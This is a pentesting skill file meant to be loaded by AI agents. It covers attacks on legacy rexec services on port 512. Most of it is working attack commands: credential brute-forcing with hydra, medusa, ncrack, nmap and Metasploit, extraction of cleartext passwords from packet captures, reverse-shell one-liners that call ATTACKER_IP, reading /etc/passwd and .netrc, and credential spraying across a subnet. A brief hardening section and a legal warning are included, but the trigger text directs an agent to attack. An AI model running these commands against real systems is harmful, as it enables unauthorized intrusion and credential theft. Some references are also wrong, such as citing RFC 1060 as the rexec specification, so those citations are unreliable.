Hacktricks-skills rexec-pentesting

Pentest and exploit Rexec (port 512) services. Use this skill whenever you encounter port 512/tcp open during enumeration, need to brute-force rexec credentials, extract credentials from network captures, or exploit legacy r-services. Trigger for any rexec-related tasks including nmap scanning, hydra brute-forcing, credential sniffing, or post-exploitation command execution.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/network-services-pentesting/512-pentesting-rexec/SKILL.MD

source content

Rexec Pentesting Skill

Rexec (remote exec) is a legacy Berkeley r-service that allows remote command execution with clear-text username/password authentication. It's insecure by design but still appears on legacy UNIX systems and network equipment.

When to Use This Skill

Port 512/tcp is open during network enumeration
You need to brute-force rexec credentials
You have network captures containing rexec traffic
You need to execute commands via rexec after gaining credentials
You're assessing legacy r-services security

Quick Reference

Task	Command
Manual test	`(echo -ne "0\0user\0pass\0id\0"; cat)
Client tool	`rexec -l user -p password <target> "command"`
Nmap scan	`nmap -p 512 --script rexec-info <target>`
Hydra brute	`hydra -L users.txt -P pass.txt rexec://<target> -s 512`
Sniff creds	`tshark -r capture.pcap -Y 'tcp.port==512' -T fields -e data.decoded`

1. Initial Enumeration

Nmap Discovery

# Basic service detection
nmap -p 512 --script rexec-info <target>

# Banner grabbing and misconfiguration check
nmap -p 512 -sV <target>

The

rexec-info

script tests for stdout port misconfigurations that could allow unauthenticated access.

Manual Protocol Test

Rexec protocol sends NUL-terminated strings: port, username, password, command.

# Test with known credentials
(echo -ne "0\0username\0password\0id\0"; cat) | nc <target> 512

# Test with empty password (some configs allow this)
(echo -ne "0\0username\0\0id\0"; cat) | nc <target> 512

Expected output: If credentials are valid, you receive command output. If invalid, you get a failure status byte.

2. Brute-Force Attacks

Hydra (Recommended - Fastest)

# Basic brute-force
hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8

# With specific user
hydra -l admin -P passwords.txt rexec://<target> -s 512

# With wordlist for both
hydra -L /usr/share/wordlists/users.txt -P /usr/share/wordlists/rockyou.txt rexec://<target> -s 512 -t 16

Parameters:

```
-t
```
: Threads (increase for faster attacks, default 16)
```
-s
```
: Port (512 for rexec)
```
-V
```
: Verbose output
```
-f
```
: Stop after first success

Nmap NSE Script

# Brute-force with Nmap
nmap -p 512 --script rexec-brute \
  --script-args "userdb=users.txt,passdb=rockyou.txt" \
  <target>

Medusa

medusa -h <target> -M rexec -u users.txt -P passwords.txt -p 512

Ncrack

ncrack -U users.txt -P passwords.txt rexec://<target>:512

Metasploit

use auxiliary/scanner/rservices/rexec_login
set RHOSTS <target>
set USER_FILE /path/to/users.txt
set PASS_FILE /path/to/passwords.txt
set THREADS 50
run

# Check database for found credentials
db_status credentials

3. Credential Extraction from Captures

Since rexec transmits everything in clear-text, network captures contain plaintext credentials.

Using tshark

# Extract credentials from pcap
tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
  awk -F"\\0" '{print $2":"$3" -> "$4}'

# Output format: username:password -> command

Using Wireshark

Open capture file
Apply filter:
```
tcp.port == 512
```
Right-click packet → Decode As → TCP port 512 → REXEC
View parsed username, password, and command fields

Using tcpdump + grep

tcpdump -r capture.pcap -nn -X | grep -A5 "512" | \
  grep -oP '[a-zA-Z0-9_]+\x00[a-zA-Z0-9_]+\x00' | \
  sed 's/\x00/:/g'

4. Post-Exploitation

Basic Command Execution

# Execute single command
rexec -l <user> -p <password> <target> "<command>"

# Examples
rexec -l user -p pass <target> "id"
rexec -l user -p pass <target> "uname -a"
rexec -l user -p pass <target> "cat /etc/passwd"

Reverse Shell

# Spawn reverse shell via rexec
rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'

# Alternative with netcat
rexec -l user -p pass <target> 'nc ATTACKER_IP 4444 -e /bin/bash'

# Python one-liner
rexec -l user -p pass <target> 'python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])"'

Privilege Escalation Checks

# Check for root access via pam_rootok
rexec -l root -p pass <target> "id"

# Check user privileges
rexec -l user -p pass <target> "groups"
rexec -l user -p pass <target> "sudo -l"

# Check for .netrc files (lateral movement)
rexec -l user -p pass <target> "cat ~/.netrc"

Command Chaining

Rexec executes via

/bin/sh -c

, so shell metacharacters work:

# Chain multiple commands
rexec -l user -p pass <target> "id; whoami; uname -a"

# Command substitution
rexec -l user -p pass <target> "cat /etc/passwd | grep -v nologin"

# Backticks
rexec -l user -p pass <target> "echo \$(whoami)"

5. Lateral Movement

Check for .netrc Files

# Extract credentials from .netrc
rexec -l user -p pass <target> "cat ~/.netrc"

# Parse .netrc format
# machine hostname
# login username
# password password

Reuse Credentials

# Try same credentials on other hosts
for host in 192.168.1.{1..254}; do
  rexec -l user -p pass $host "id" 2>/dev/null && echo "Success on $host"
done

6. Hardening Recommendations

For Defenders

Disable rexec entirely - Replace with SSH

# Comment out in /etc/inetd.conf or /etc/xinetd.d/rexec
# exec stream tcp nowait root /usr/sbin/in.rexecd in.rexecd

Restrict with TCP wrappers (if must keep)

# /etc/hosts.allow
in.rexecd: 192.168.1.0/24

# /etc/hosts.deny
in.rexecd: ALL

Firewall rules

iptables -A INPUT -p tcp --dport 512 -j DROP

Monitor for rexec traffic

# Alert on port 512 connections
tcpdump -i any port 512 -n

Disable all r-services together
- rexec (512)
- rsh (514)
- rlogin (513)

7. Scripts

Use the bundled scripts for common tasks:

scripts/rexec-bruteforce.sh

Automated brute-force with multiple tools.

scripts/rexec-sniff-creds.sh

Extract credentials from pcap files.

scripts/rexec-test.sh

Quick connectivity and authentication test.

Safety Notes

⚠️ Legal Warning: Only use these techniques on systems you own or have explicit authorization to test.

⚠️ Clear-text credentials: All rexec traffic is unencrypted. Never use in production networks.

⚠️ Legacy systems: Rexec is deprecated. Modern systems should use SSH instead.

References

RFC 1060 - Rexec Protocol Specification
Nmap rexec-brute: https://nmap.org/nsedoc/scripts/rexec-brute.html
Metasploit rexec_login: https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login
Hydra documentation: https://github.com/vanhauser-thc/thc-hydra